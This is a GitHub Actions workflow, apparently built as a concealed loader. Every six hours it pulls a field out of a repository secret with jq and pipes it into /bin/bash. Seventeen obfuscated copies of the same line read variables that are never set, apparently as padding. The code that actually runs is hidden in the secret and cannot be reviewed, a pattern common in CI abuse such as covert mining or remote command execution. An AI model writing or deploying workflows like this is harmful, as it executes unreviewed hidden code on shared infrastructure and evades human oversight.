name: hantao19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '0 4/6 * * *'

jobs:  # 13610
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hantao19871010
        env:
          j53050: ${{ secrets.j53050 }}
        run: |
          echo $j53050 | jq -r .lykhx58 | /bin/bash
          echo $df2 | jq -r .g48 | /bin/bash
          echo $j5 | jq -r .a8 | /bin/bash
          echo $pupf28962 | jq -r .ste2993 | /bin/bash
          echo $g5 | jq -r .bch9963 | /bin/bash
          echo $zjc73897 | jq -r .sad9 | /bin/bash
          echo $s2 | jq -r .t5273 | /bin/bash
          echo $uf531 | jq -r .cyz969 | /bin/bash
          echo $lj6 | jq -r .k337 | /bin/bash
          echo $qugr07 | jq -r .mpsx25620 | /bin/bash
          echo $s36560 | jq -r .k153 | /bin/bash
          echo $mnxgp6 | jq -r .ianzx769 | /bin/bash
          echo $a3 | jq -r .ldm8 | /bin/bash
          echo $l495 | jq -r .yw5235 | /bin/bash
          echo $ncjn1 | jq -r .k0 | /bin/bash
          echo $btu25564 | jq -r .oz0 | /bin/bash
          echo $u84 | jq -r .y567 | /bin/bash
          echo $qwkg82420 | jq -r .wjk1 | /bin/bash

